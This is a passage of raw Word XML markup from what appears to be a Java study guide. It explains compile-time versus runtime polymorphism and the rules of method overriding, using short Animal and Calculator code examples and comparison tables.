            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD65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behavior sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326ED9C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1A5CCB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10932E15" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5702663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implementation logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12196DD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49844C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1338DE8" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="795BA07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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B28B2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353CED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BFC85E3" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D8024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ly implemented logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36DC478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BB0781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60E137F5" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21A94CC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world analogy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F2422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can do”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E1D62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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BEE86F" w14:textId="1371EA64"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E1AC12E">
          <v:rect id="_x0000_i1341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7E01B" w14:textId="77777777" w:rsidR="000D5087" w:rsidRPr="00CE4B95" w:rsidRDefault="000D5087">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc197867334"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Compile time and Run time polymorphism?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="3ECECEBB" w14:textId="1A980768" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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means “many forms” — the same method name can behave differently depending on the object or context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDC489"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8484F">
          <v:rect id="_x0000_i1342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9852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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04EFCC" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00B1271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compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70306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CFE1B0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4B6021E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4200870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 + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948428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2BFC1E" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3674000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1B31494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4CD43E7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6D651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CC525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497EA5E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culator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB026E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 10));      // calls int version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D223E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5, 6.5));   // calls double version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8D5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iler decides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which method to call based on method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAFA17"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919">
          <v:rect id="_x0000_i1343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88F177"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA43A0A" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="001176DA">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runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual object type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135357B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F57F4C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5610B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CCD278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sound");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2571820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59A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46862" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D35293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B7A932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86CCC6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20E9BDC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22E7B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F4E1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5C0290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a = new Dog();  // reference of parent, object of child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697641E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makeSound();         // Output: Bark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA0B3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decides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which version to call at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CF27A"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3B3A">
          <v:rect id="_x0000_i1344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F26D5"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822"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="5FA9727A" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65D1A49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36A47F0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D4418F" w:rsidRPr="00CE4B95" w14:paraId="6D3B0224" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02998AB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576C350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ll print() with a String or an int – the compiler picks the right version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="1428D82D" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BCE238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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E36B77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remote control (reference) is for a TV, but it could control a SmartTV or LEDTV — behavior differs at runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DF9F3B6"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DD0F">
          <v:rect id="_x0000_i1345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907844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674"/>
        <w:gridCol w:w="2298"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="4F73EB4A" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3069844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B03BF4D"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39CED95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time Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="07D55176" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D16612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Known As</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9AFF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2B521AA7"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r>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="3E2331AA" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA2D8B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ing Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B60847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 Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C7054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D4418F" w:rsidRPr="00CE4B95" w14:paraId="70EEC729" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673526A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7D1934C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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B0A9B2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="2D9F4A40" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="135B5F3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33617E0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3E2BB3D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="32EA9B12" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F038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ision Made By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64B3F8F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r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6761ED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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="75112B75" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4BBD7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Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB0FD8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59FA5EB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bl>
    <w:p w14:paraId="0488E0EF" w14:textId="6DE3B326"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BCB11D">
          <v:rect id="_x0000_i1346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A5076F" w14:textId="0F0E7210" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc197867335"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is method overriding?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="6976ACF2" w14:textId="1647D7FD" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF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s a feature in </w:t>
      </w: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where a subclass provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a method that is already defined in its superclass. The </w:t>
      </w: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name, return type, and parameters) in the subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>must be identical</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the one in the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5BCAC"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AB3D68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riding happens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dynamic polymorphism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039837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a subclass to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redefine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the behavior of a method inherited from the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297502DC"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annotation is used to indicate method overriding explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB8638"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039AC">
          <v:rect id="_x0000_i1347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458D315"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Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6A4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subclass, you define a method with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F11F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624E9C9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7CDA357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s display method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4192D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BD52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1DA4E4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4BA99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60B64CA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CA7054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E8306A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s overridden display method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A330E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7C789"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CEC6C2"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14D3B">
          <v:rect id="_x0000_i1348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ABE13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Method Overriding in Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB9B3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7ADD16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1247B0D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635800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0795D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0B669E" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286C804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65813B0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C2F16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36B3150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0F3A212F"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7BCAD"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ADFFF4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77411BF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7D9C06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7B6C66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59E6EE0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0B45953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7A850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4DFE71" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0526DE9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F3505E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030DD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Animal = new Animal();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAAF8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381DAD3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658B97AF" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3746F9F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Animal.sound();  // Output: Animal makes a sound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFD64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ound();     // Output: Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBB34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sound();     // Output: Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18F2E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2B281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4ACC4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304086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both override the sound() method of th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class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2784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the JVM decides which sound() method to call based on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og or Cat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C61F4"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ECB0CB">
          <v:rect id="_x0000_i1349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396AFA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Rules for Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD3D42"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name, return type, and parameters must be identical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3083F188"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xml:space="preserve"> The access modifier of the overriding method in the subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be more restrictive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the method in the superclass (e.g., if the superclass method is public, the subclass method must be public as well).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5BF1A"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The return type of the overriding method in the subclass must be the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s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variant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., a subclass of the original return type).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33113A56"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s can't be overridden:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a method is declared as final, it can't be overridden in the subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F7D2AE"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can't be overridden:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
